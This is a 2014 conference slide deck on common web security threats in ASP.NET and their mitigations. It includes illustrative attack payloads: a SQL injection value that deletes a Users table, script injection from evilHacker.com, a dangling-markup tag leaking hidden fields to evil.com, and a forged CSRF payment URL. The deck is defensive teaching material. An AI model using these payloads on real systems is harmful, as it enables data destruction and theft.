Embed Size (px)
DESCRIPTION
Have you heard the words : "Why would anyone hack me?". Security is a serious problem that is often taken for granted and neglected by the product owners in favour of reliability and availability. In addition there are not many developers that are aware of the threats and the long-term harms that a simple attack could do. This session covers the most common web security threats on Web applications like XSS, XSRF, XSI, tampering, leakage, SQL injection and suggests mitigation solutions and coding guidelines.
Citation preview
Nov 23, 2014Nov 23, 2014Sofia
var title =
“Web Security Threats and Solutions”;
var info = {
name: “Ivelin Andreev”,
otherOptional: “Security is not for granted”
};
Nov 23, 2014
About me
• Project Manager @
o 12 years professional experience
o .NET Web Development MCPD
o SQL Server 2012 (MCSA)
• Business Interests
o Web Development, SOA, Integration
o Security & Performance Optimization
o Horizon2020, Open BIM, GIS, Mapping
• Contact me
o www.linkedin.com/in/ivelin
o www.slideshare.net/ivoandreev
Nov 23, 2014
Web Security is Important
Common misconceptions
• I am using ASP.NET ?!?!
• I am too small to be noticed by crackers
• I am too busy for security, my brand is important
• I am not operating in the financial industry
• Security seal means nothing for customers
• Hosting provider does not matter
Nov 23, 2014
agenda();
• SQL Injection
• Cross-Site Scripting (CSS)
• Cross-Site Request Forgery (CSRF)
• Cross-Site Script Inclusion (CSSI)
• Parameter Tampering
• Information Leakage
• Distributed Denial of Service
• Demo
Nov 23, 2014
SQL injection is so old...
Don’t developers know any better?
Nov 23, 2014
SQL Injection
Def: Commands or logic inserted in SQL data channel
• Common Reasonso Dynamic query statements and string operations
o Poor programming
• Impacto Leak or loss of data
o Authentication and authorization
• Impact (you many have not considered)
o Damages limited only by the SQL account permissions
o Windows authentication user rights can be exploited
o Modify server security configuration
o Install backdoors
Nov 23, 2014
Nov 23, 2014
(Pseudo) Solutions
• Replace special symbols (-, “, ‘)o Data with special symbols not searchable
o Poor routines can create vulnerable query (i.e. –’–)
• Smugglingo Looks like a quote but not a quote - conversion on DB level
o OWASP_IL_2007_SQL_Smuggling.pdf
• NOSQL is not vulnerableo NOSQL is also vulnerable (i.e. MongoDB with JavaScript)
• Second order attackso Validate request only
o Data stored in the DB and later used in prepared queries
Nov 23, 2014
Using Parameters (in wrong manner)
• Dynamic queries (sp_executesql vs. EXEC)o exec (@sqlString) – executes T-SQL string
o sp_executesql allows for statements to be parameterized
o sp_executesql is more secure in terms of SQL injection
• Developer believes dynamic SQL is the only optionCREATE PROCEDURE GetUsers @Sort nvarchar(50) AS
DECLARE @sql nvarchar(255)
SET @sql = 'SELECT UserName FROM Users ' + @Sort
EXECUTE sp_executesql @sql
GO
o What if @Sort = ‘‘; DELETE FROM Users’
CREATE PROCEDURE GetUsers @Sort Int AS
SELECT UserName FROM Users ORDER BY
CASE WHEN @Sort = 1 THEN ( Rank() OVER (ORDER BY UserName ASC) ) END
GO
Nov 23, 2014
Prevention & Mitigation
• Parameterized queries and prepared statementso Use parameters where data are expected
o ORMs use parameters (Nhibernate, Entity Framework)
• “The least privilege” principleo Grant the minimum access rights
o Parameterized queries vs. Stored Procedure permissions
• Positive input validation (Poor)o Regular expressions / White lists (i.e. alphanumeric)
• IIS Request Query Filtering (Poor)o filtering-for-sql-injection-on-iis-7-and-later
• SQL injection and DB takeover o http://ha.ckers.org/sqlinjection/
o (SQL) http://sqlmap.org/; (NOSQL) http://www.nosqlmap.net/
Nov 23, 2014
SQL Injection with Entity Framework
• Entity Framework Raw Queriesstring query = “query” + “SQL injection code”
dbContext.Database.SqlQuery<string>(query).ToList();
o Security Considerations (Entity Framework)
• IQueryableo Can result in untrusted calls
o If provided as a library, can be casted to Context and connection
var orders = repository.GetOrders(5);
var context = ((ObjectQuery)orders).Context
o Use IEnumerable instead
Nov 23, 2014
Nov 23, 2014
Cross Site Scripting (XSS)
Def: Untrusted content displayed on page unencoded
• Caseo evilHacker injects <script> in http://goodSite.com application context
• By posting HTML form field
• By tricking user to click link with query parameters sent by mail
%3Cscript%20src%3D%27evilHacker.com%2Fscript.js%27%3E
• XSS Sourceo Query parameters, HTML form fields
o HTML Attributes (onload, onblur)
o URI requested and displayed in HTTP 404 page
o Data from DB or file system
o 3rd party data - RSS feeds or service
Nov 23, 2014
XSS – an Underestimated Threat
• Create or access any DOM element
• Hijack cookies, credentials or actions
• Take control over victim machine
Browser Exploitation Framework Projecto Open source penetration testing tool
o XSS vulnerability allows injection of BeEF
o Victim browser is hooked
o Perform actions/attacks on behalf of the victim
o Exploit system in browser context
Nov 23, 2014
Persisted XSS
• Attacker stores malicious data on server
• Unvalidated data displayed on page w/o encoding
• Store once – run many
Nov 23, 2014
Reflected XSS
• Malicious client data is immediately used by server
• Unvalidated data displayed on page w/o encoding
• Requires social engineeringo Convince users to follow a URL (via e-mail or forum comment)
• Detection Toolso OWASP Xenotix XSS Exploit Framework
o XSS-ME FireFox plugin
Nov 23, 2014
Client XSS & HTML Injection
• DOM-based XSSo Malicious data executed as a part of DOM manipulation
o Requires social engineering
document.write(“
<OPTION value=1>"+document.location.href.substring(…) + ”</OPTION>");
• Dangling Markup HTML injectiono Image source w/o closing tag
o On load of image – a request is made to attacker’s site
<img src='http://evil.com/log.cgi? ← Injected line with a non-terminated parameter ...
<input type="hidden" name=“SecretField" value="12345">
...
'← Normally-occurring apostrophe somewhere in page text
o HTML leaks to evil site
Nov 23, 2014
All user input
is evil
Nov 23, 2014
XSS Prevention & Mitigation
• HTML escape then JavaScript escape
• Encode on usage, not appearanceo HttpUtility.HtmlEncode(string)
o HttpUtility.JavaScriptStringEncode(string)
o Microsoft Anti-Cross Site Scripting Library
• Use proven sanitizerso Blacklist vs. Whitelist
o Valid JavaScript can be created by poor filtering routine
<SscriptCscriptRscriptIscriptPscriptTscript>…
• Check 3rd party resources (i.e. jQuery plugins)
• Analyze places where DOM elements are createdo Use document.createElement() rather than $(obj).html()
Nov 23, 2014
Built-In XSS Prevention Features (.NET)
• Request Validationo ASP .NET Web Forms: @Page EnableRequestValidation=“true”
o ASP .NET MVC: Controller.ValidateRequest=true;
o <httpRuntime requestValidationMode=“4.0" />
• Do not turn off request validationo “Easy fix” for HTML editors
o Use HTML editors that HTML encode before submission
• Reliabilityo Microsoft advice: Relying solely on built-in request validation is not enough
o No known vulnerabilities now (but not in the past)
• AntiXss.HtmlEncode() vs. HttpUtility.HtmlEncode() o HttpUtility just ensures output does not break HTML
o Performance penalty is +0.1 ms/transaction
Nov 23, 2014
Content Security Policy
• HTTP Headero Content-Security-Policy: script-src ‘self’
• Featureso Whitelist sources of trusted content
o Blocks resources from untrusted locations (incl. inline scripts)
o Report of blocked resources
• Directiveso script-src; img-src; media-src; style-src; frame-src; connect-src
• Keywordso 'none‘, 'self‘, 'unsafe-inline‘, 'unsafe-eval‘
• Browser supporto CanIUse.com CSP?
Nov 23, 2014
CSRF has nothing to do with sea-surf
Nov 23, 2014
• Impacto EvilHacker.com cannot read DOM but can POST / GET
o Act on behalf of the user (i.e. payment)
o User access is blocked or stolen
Cross-Site Request Forgery (CSRF)
Def: Unauthorised commands transmitted from a user whom a website trusts
• Synonyms: One-click attack, Session riding
• Caseo User logs in http://goodSite.com as usual
o http://evilHacker.com can
• POST new password in form to GoodSite.com
• GET http://goodSite.com/Payment.aspx?amount=1000&userID=EvilHacker
o Authenticated because cookies are sent
Nov 23, 2014
Cross Site Scripting Inclusion (XSSI)
• Caseo Exploits <script> element exception to Same Origin Policy
o http://goodSite.com includes own <script> for AJAX request
o http://evilHacker.com includes the same script
• Authenticated because cookies are sent
o Server returns JSON wrapped in function call
<script type="application/javascript" src= "http://goodSite.com/Svc/Get?callback=parseResponse" />
o SCRIPT evaluated in evilHacker.com context and JSON is stolen
parseResponse ({“this”:”is”,”json”:”data”});
• Impacto User data are stolen
• Preventiono Check policy of script inclusion
Nov 23, 2014
CSRF Prevention & Mitigation
• NONCE token (URL, hidden field)o Checked upon submission
o Protected by browser same origin policy
• User defined (password, CAPTCHA)
• Built-In (ASP.NET)Page.ViewStateUserKey=Session.SessionID
o Signs the ViewState with unique user key
• Built-In (ASP.NET MVC)o HtmlHelper.AntiForgeryToken() - generates a hidden form field
o [ValidateAntiForgeryToken] attribute for controller validation
o NOT a single-use token
• POST(HTTP) makes attacks hardero Cross domain POSTs can be limited (CORS)
Nov 23, 2014
Parameter tampering
Nov 23, 2014
Parameter Tampering
Def: Parameters changed in unintended way
Common reasons
• Query string; Hidden form fields;
• Data-channel interception (M-i-t-M attack)
Common Mistakes
• Client side validation only
• Mismatch with predefined set of values
• Not validated access to entities on server (i.e. EntityId=???)
• Unprotected data sent to cliento Query strings; JavaScript parameters
Nov 23, 2014
Tampering Prevention & Mitigation
• Built-In (ASP.NET MVC) - None
• Built-In (ASP.NET)
• ViewStateo Not encrypted by default (Binary serialized, Base64 Encoded)
o Do not turn EnableViewstateMac off (Web Farm, X-domain POST)
• Event Validationo “Invalid postback or callback argument…”
o Not encrypted (Binary serialized, Base64 Encoded)
o Do not turn event validation off
o Register for event validation
protected override void Render(HtmlTextWriter writer) {
…
Page.ClientScript.RegisterForEventValidation(ddl.UniqueID, “John”); }
Nov 23, 2014
Encryption & Hashing
Nov 23, 2014
Encryption
• Protects sensitive data (if stolen)o Credentials; Auth tokens; Configuration;
• SQL data encryptiono EncryptByPassPhrase
o EncryptByCert
o EncryptByKey
• Application levelo AesCryptoService, RijndaelManaged
o TripleDESCryptoServiceProvider
• Connection string encryptiono Machine specific encryption after deploy
aspnet_regiis –pe “connectionstrings” –app /[appname]
o Decryption done automatically
Nov 23, 2014
Hashing
• Irreversible function (MD5, SHA1, SHA256)o MD5 generator: http://www.md5.cz/
o Smaller than the data
• Collisions allowed
• Usageo Assure information was not changed (tampered)
o Protect passwords
• Compromisingo Good algorithm is always compromised by weak passwords
o Brute force (GPU)
o Precalculated “Rainbow tables” (Dictionary attack)
• http://www.hashkiller.co.uk/md5-decrypter.aspx
Nov 23, 2014
Protecting Hashes
• Random Salto [SecretText][Salt] -> [Hash]
o Changes hash value
o Invalidates rainbow tables
o Slows down brute force attacks
• Complex passwords
• Slow algorithms
• Key stretching (Rfc2898DeriveBytes class)U1 = PRF(Password, Salt)
U2 = PRF(Password, U1)
...
Uc = PRF(Password, Uc-1)
• Outsource sensitive data storage (if possible)
Nov 23, 2014
Information Leakage
• Loss of sensitive datao Display trace and log information
o Display raw error messages
o Google it: inurl: elmah.axd aspxauth
o Attacker can profile application and select appropriate attack
• Mitigationo Custom error pages <CustomErrors mode=“on” defaultRedirect=“Error.aspx”>
o Turn off tracing
• Retail mode <deployment retail=“true”/>o Set in machine.config for the whole server
o Sets Custom Errors = “on”, Debug = “false”
o Trace information is not displayed
• Test
Nov 23, 2014
Transport Layer Security
Nov 23, 2014
SSL / TLS
• HTTP over SSL prevents packet sniffing
• Force SSL for the entire siteo Or at least for credentials interchange
• ASP.NET MVC: RequireHttpsAttributeo Redirects Request to HTTPS scheme
• ASP.NET Web Formso Requires custom code
o https://code.google.com/p/securityswitch/
<securitySwitch mode="RemoteOnly"><paths>
<add path="~/Login.aspx" /></paths>
</securitySwitch>
Nov 23, 2014
Distributed Denial of Service
Nov 23, 2014
Denial of Service Attack
DDoS
• Anonymous?!o LOIC (Hive mode)
o TOR Anonymity Project
• Hash DoS (since 2003)o POST params in hash table (with collisions)
o Too many hashes = 100% CPU
o Patch: Block POST of >1000 form fields
Prevention & Mitigation
• Dynamic IP restrictions IIS extensiono http://www.iis.net/downloads/microsoft/dynamic-ip-restrictions
• Good logging and diagnostics is essential
Nov 23, 2014
Demo
DEMO
Nov 23, 2014
Takeaways
• Guidelines & Code Labso Open Web Application Security Project www.owasp.org
o Web App Exploits and Defenses google-gruyere
o 2013 Top 10 Web Security Vulnerabilities Top_10_2013
o 2011 Top 25 Most Dangerous Software Errors cwe.mitre.org/top25
• Articleso Hack-proofing ASP.NET Web Applications Adam Tuliper
o Hash DDoS Hash-Dos-Attack
• .NET Source Code referencesource.microsoft.com
• Tools o ASafaWeb Analyser asafaweb.com
o Website and Web Server Security Testing www.beyondsecurity.com
Nov 23, 2014
Upcoming events
ISTA Conference 26-27 November
http://istabg.org/
Stay tuned for 2015:
Azure Bootcamp http://azure-camp.eu/
UXify Bulgaria http://uxify.org/
SQLSaturday https://www.sqlsaturday.com/
and more js.next();
Nov 23, 2014
Thanks to our Sponsors:
Diamond Sponsor:
Gold Sponsors:
Swag Sponsors:
Media Partners:
Silver Sponsors:
Hosting partner:
Technological Partners:
